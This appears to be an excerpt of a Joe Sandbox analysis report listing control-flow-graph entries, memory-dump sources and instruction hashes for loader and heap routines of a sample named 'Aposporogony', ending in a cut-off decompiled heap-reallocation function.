                                                                                                                                                                                      control_flow_graph 27 1d882dc0-1d882dcc LdrInitializeThunk
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: b21db49a1e8d1b7311d7abfcd0ffa1beb6ce251caa11af516a192dfbe3bb44fb
                                                                                                                                                                                      • Instruction ID: 5085b1b1af0a6a52692bc405248916fde15e5bd086ca6bf8b6b4e8e08a52105e
                                                                                                                                                                                      • Opcode Fuzzy Hash: b21db49a1e8d1b7311d7abfcd0ffa1beb6ce251caa11af516a192dfbe3bb44fb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7590027126100542D5447159450474A001547D1301F91C455A5459514EC66D8DD97677
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 25 1d882d10-1d882d1c LdrInitializeThunk
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: da48db4d56a153733cc1b1016acb2403285763b93d9c71b68fc82e01131f3150
                                                                                                                                                                                      • Instruction ID: f74d701878a832ba3d57358d43542e7bc731d59393b1e8196c3948cca2cf0bf9
                                                                                                                                                                                      • Opcode Fuzzy Hash: da48db4d56a153733cc1b1016acb2403285763b93d9c71b68fc82e01131f3150
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3290023126100553D5156159460470B001947D1241FD1C856A0819518DD66A8956B133
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 24 1d882cf0-1d882cfc LdrInitializeThunk
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: b0259bfa2f3906f625223ba2419060d4dc06c8feb5c1cecae8066998907b025f
                                                                                                                                                                                      • Instruction ID: 28e0f618b18d1f0f352bf7cc738d024168667cbce873956c5fa354bd6c1b1700
                                                                                                                                                                                      • Opcode Fuzzy Hash: b0259bfa2f3906f625223ba2419060d4dc06c8feb5c1cecae8066998907b025f
                                                                                                                                                                                      • Instruction Fuzzy Hash: F49002212A2042925949B159450450B401657E1241BD1C456A1809910CC53A985AE633
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 22 1d882c30-1d882c3c LdrInitializeThunk
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: cb29d508a2429bf260d6be16eabadc18ed2f782d93e4fa1b5a3144a4c079ffe1
                                                                                                                                                                                      • Instruction ID: 05868e97fa6a536795ae14d5d4763801e9be198506a8df1a9c7c4dc366ac6ca2
                                                                                                                                                                                      • Opcode Fuzzy Hash: cb29d508a2429bf260d6be16eabadc18ed2f782d93e4fa1b5a3144a4c079ffe1
                                                                                                                                                                                      • Instruction Fuzzy Hash: D990022927300142D5847159550860E001547D2202FD1D859A040A518CC929886D6333
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 23 1d882c50-1d882c5c LdrInitializeThunk
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: f052f1220fcda7121e3ec76ed4336e09de636a6d8163c42147e54cb64c94a223
                                                                                                                                                                                      • Instruction ID: b2e3270b1e24b12d83a7836eb2db9e990891a8802bf79f3fa872db988d231bf5
                                                                                                                                                                                      • Opcode Fuzzy Hash: f052f1220fcda7121e3ec76ed4336e09de636a6d8163c42147e54cb64c94a223
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9090022136100143D5447159551860A401597E2301F91D455E0809514CD929885A6233
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: a97cf7e44fa80188b23fc89b8e870ff0cdfedf06e2528bba29b6d9e1327100ce
                                                                                                                                                                                      • Instruction ID: 408893f3fe8e310b09cd956a4549371882f199b219aa1477eede575c1a798dba
                                                                                                                                                                                      • Opcode Fuzzy Hash: a97cf7e44fa80188b23fc89b8e870ff0cdfedf06e2528bba29b6d9e1327100ce
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5390022127180182D60465694D14B0B001547D1303F91C559A0549514CC92988656533
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 29 1d882eb0-1d882ebc LdrInitializeThunk
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: ad0aaaebf8d13bd525dce1a9889afbb3b134cd1612c50529d377b28bf540a5fc
                                                                                                                                                                                      • Instruction ID: 40b4ec76bd6d9f08b39b6bae7957fe2170c958ca15fed82a5f7f0a7360bad703
                                                                                                                                                                                      • Opcode Fuzzy Hash: ad0aaaebf8d13bd525dce1a9889afbb3b134cd1612c50529d377b28bf540a5fc
                                                                                                                                                                                      • Instruction Fuzzy Hash: DB90043137140543D504715D4D1470F001547D1303FD1C455F155D515DC73DCC557573
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 30 1d882ed0-1d882edc LdrInitializeThunk
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 0175ed690475e6dbcf32cf7ea9be0d9117935c20f0190759509de1f6ac5bcd83
                                                                                                                                                                                      • Instruction ID: d97f136ad6f257a1d949f8bd20d4dd3c7cda04fb81cfb5b4f34d6db3b4fc46ce
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0175ed690475e6dbcf32cf7ea9be0d9117935c20f0190759509de1f6ac5bcd83
                                                                                                                                                                                      • Instruction Fuzzy Hash: 999002216610018245447169894490A40156BE2211B91C565A0D8D510DC56D88696677
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 28 1d882e50-1d882e5c LdrInitializeThunk
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 62a777c76bba5c7e937cbc6ce20b5241fe004c4be07a5e4ae818e716ad5a01e0
                                                                                                                                                                                      • Instruction ID: ff7227c9481fa8d597cf92bf94a85041d8869677cbd04f66849a03a81112d3fd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 62a777c76bba5c7e937cbc6ce20b5241fe004c4be07a5e4ae818e716ad5a01e0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 379002613A100582D50461594514B0A001587E2301F91C459E1459514DC62DCC567137
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 18 1d8829f0-1d8829fc LdrInitializeThunk
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 2b81e04ed3ad3787dd2657b6faa4b4b9b5df11a824a0917023ffd214907505bb
                                                                                                                                                                                      • Instruction ID: c681355c5eafa1a720d61bf6191f28ee9a98e105d4e8f8f56da161ecb5bd992c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b81e04ed3ad3787dd2657b6faa4b4b9b5df11a824a0917023ffd214907505bb
                                                                                                                                                                                      • Instruction Fuzzy Hash: C4900225271001430509A559070450B005647D6351791C465F140A510CD63588656133
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 20 1d882b90-1d882b9c LdrInitializeThunk
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 8a88f1be66b0d1968d186791eece52e461168bb23e3928df60ad7b7b4503b1ff
                                                                                                                                                                                      • Instruction ID: 8d47fff5dd9237e55e34e7fd252e0c198a77138a00262ba4db4351e2c332f77d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a88f1be66b0d1968d186791eece52e461168bb23e3928df60ad7b7b4503b1ff
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3490023126108942D5146159850474E001547D1301F95C855A4819618DC6A988957133
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 21 1d882bc0-1d882bcc LdrInitializeThunk
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: dd86e522c0286048fd7f55346f6aba8ecf16ef6b2824760a7f68db5fe669b187
                                                                                                                                                                                      • Instruction ID: 50db7c547124ded83e46c437908293a38ac9f719c7280040877aab243091b19f
                                                                                                                                                                                      • Opcode Fuzzy Hash: dd86e522c0286048fd7f55346f6aba8ecf16ef6b2824760a7f68db5fe669b187
                                                                                                                                                                                      • Instruction Fuzzy Hash: E490023126100542D5046599550864A001547E1301F91D455A5419515EC67988957133
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 19 1d882b10-1d882b1c LdrInitializeThunk
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 01193564cb41862b28df4fb44ef353fed214d7e4226833f6623c0cdca98aa91b
                                                                                                                                                                                      • Instruction ID: 243b78ee92b971433000fd193643a1066521c9fc9f99babc8004c813f771349c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 01193564cb41862b28df4fb44ef353fed214d7e4226833f6623c0cdca98aa91b
                                                                                                                                                                                      • Instruction Fuzzy Hash: F890023126100942D5847159450464E001547D2301FD1C459A041A614DCA298A5D77B3
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: 1ead8a1b6662e7fbd0ed7e7a90a79c1198c0ec8a538c9b1dba5100a509051273
                                                                                                                                                                                      • Instruction ID: 39e090c0c3c6ac0cb5fbc80a609b382fdd3517b5f74da1549396e1c164a53676
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ead8a1b6662e7fbd0ed7e7a90a79c1198c0ec8a538c9b1dba5100a509051273
                                                                                                                                                                                      • Instruction Fuzzy Hash: D090023166510542D5046159461470A101547D1201FA1C855A0819528DC7A9895575B3
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2221418532.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1660000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                                                      • String ID: O9Ev$h
                                                                                                                                                                                      • API String ID: 1852365436-3501554740
                                                                                                                                                                                      • Opcode ID: d01772549a6ace4ba40b132f600f5c6e0d332215849621af5f0827bb215e23d9
                                                                                                                                                                                      • Instruction ID: bf50badcbb2905cc2bdeff904cf92df8e6fe4689bf48c2aa7663907fc4644a04
                                                                                                                                                                                      • Opcode Fuzzy Hash: d01772549a6ace4ba40b132f600f5c6e0d332215849621af5f0827bb215e23d9
                                                                                                                                                                                      • Instruction Fuzzy Hash: F5213521609397DAEF365E78CD943DA3BA22F12720F99429DCCC41F186D7744A85C717
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 14 1d882b2a-1d882b2f 15 1d882b3f-1d882b46 LdrInitializeThunk 14->15 16 1d882b31-1d882b38 14->16
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D810000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.2244516243.000000001D939000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1d810000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                      • Opcode ID: a101806e2239ec6a14d400241b98c0e6a0ba4384858978227d6b99c3d59af5fa
                                                                                                                                                                                      • Instruction ID: 67e53dafe5cfb51c0ebf2c194558177785873c9db4c40afb6559c1d7366234b1
                                                                                                                                                                                      • Opcode Fuzzy Hash: a101806e2239ec6a14d400241b98c0e6a0ba4384858978227d6b99c3d59af5fa
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5BB092729524C7CAEA05EB604B0CB1B7A506BD1701F66C4A6E28A4745F873DC0A5F277
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                                                      			E1D8EFDF4(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                      				signed int _t130;
                                                                                                                                                                                      				signed int _t132;
                                                                                                                                                                                      				intOrPtr _t138;
                                                                                                                                                                                      				intOrPtr _t139;
                                                                                                                                                                                      				signed int _t149;
                                                                                                                                                                                      				signed int _t150;
                                                                                                                                                                                      				intOrPtr _t151;
                                                                                                                                                                                      				signed int _t152;
                                                                                                                                                                                      				intOrPtr _t155;
                                                                                                                                                                                      				intOrPtr _t159;
                                                                                                                                                                                      				intOrPtr _t172;
                                                                                                                                                                                      				signed int _t173;
                                                                                                                                                                                      				signed int _t174;
                                                                                                                                                                                      				signed char _t177;
                                                                                                                                                                                      				signed int _t178;
                                                                                                                                                                                      				signed int _t183;
                                                                                                                                                                                      				void* _t184;
                                                                                                                                                                                      				signed char _t192;
                                                                                                                                                                                      				signed int _t193;
                                                                                                                                                                                      				intOrPtr _t195;
                                                                                                                                                                                      				intOrPtr _t199;
                                                                                                                                                                                      				signed int _t209;
                                                                                                                                                                                      				signed int _t226;
                                                                                                                                                                                      				signed char _t236;
                                                                                                                                                                                      				intOrPtr _t240;
                                                                                                                                                                                      				signed int* _t248;
                                                                                                                                                                                      				signed int _t253;
                                                                                                                                                                                      				signed int _t255;
                                                                                                                                                                                      				signed int _t267;
                                                                                                                                                                                      				signed int _t278;
                                                                                                                                                                                      				signed int* _t279;
                                                                                                                                                                                      				intOrPtr* _t283;
                                                                                                                                                                                      				void* _t284;
                                                                                                                                                                                      				void* _t286;
                                                                                                                                                                                      
                                                                                                                                                                                      				_push(0x40);
                                                                                                                                                                                      				_push(0x1d91d430);
                                                                                                                                                                                      				E1D897BE4(__ebx, __edi, __esi);
                                                                                                                                                                                      				_t281 = __ecx;
                                                                                                                                                                                      				 *((intOrPtr*)(_t284 - 0x3c)) = __ecx;
                                                                                                                                                                                      				 *((char*)(_t284 - 0x19)) = 0;
                                                                                                                                                                                      				 *(_t284 - 0x24) = 0;
                                                                                                                                                                                      				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                                                                                                                                                      					 *((intOrPtr*)(_t284 - 4)) = 0;
                                                                                                                                                                                      					 *((intOrPtr*)(_t284 - 4)) = 1;
                                                                                                                                                                                      					_t130 = E1D837662("RtlReAllocateHeap");
                                                                                                                                                                                      					__eflags = _t130;
                                                                                                                                                                                      					if(_t130 == 0) {
                                                                                                                                                                                      						L72:
                                                                                                                                                                                      						 *(_t284 - 0x24) = 0;
                                                                                                                                                                                      						L73:
                                                                                                                                                                                      						 *((intOrPtr*)(_t284 - 4)) = 0;
                                                                                                                                                                                      						 *((intOrPtr*)(_t284 - 4)) = 0xfffffffe;
                                                                                                                                                                                      						E1D8F02E6(_t281);
                                                                                                                                                                                      						_t132 =  *(_t284 - 0x24);
                                                                                                                                                                                      						goto L75;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t236 =  *(__ecx + 0x44) | __edx;
                                                                                                                                                                                      					 *(_t284 - 0x30) = _t236;
                                                                                                                                                                                      					 *(_t284 - 0x34) = _t236 | 0x10000100;
                                                                                                                                                                                      					__eflags =  *(_t284 + 0xc);
                                                                                                                                                                                      					if( *(_t284 + 0xc) == 0) {
                                                                                                                                                                                      						_t267 = 1;
                                                                                                                                                                                      						__eflags = 1;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t267 =  *(_t284 + 0xc);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t138 = ( *((intOrPtr*)(_t281 + 0x94)) + _t267 &  *(_t281 + 0x98)) + 8;
                                                                                                                                                                                      					 *((intOrPtr*)(_t284 - 0x40)) = _t138;
                                                                                                                                                                                      					__eflags = _t138 -  *(_t284 + 0xc);
                                                                                                                                                                                      					if(_t138 <  *(_t284 + 0xc)) {
                                                                                                                                                                                      						L68:
                                                                                                                                                                                      						_t139 =  *[fs:0x30];
                                                                                                                                                                                      						__eflags =  *(_t139 + 0xc);
                                                                                                                                                                                      						if( *(_t139 + 0xc) == 0) {
                                                                                                                                                                                      							_push("HEAP: ");
                                                                                                                                                                                      							E1D83B910();
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							E1D83B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_push( *((intOrPtr*)(_t281 + 0x78)));
                                                                                                                                                                                      						E1D83B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t284 + 0xc));
                                                                                                                                                                                      						goto L72;
                                                                                                                                                                                      					}
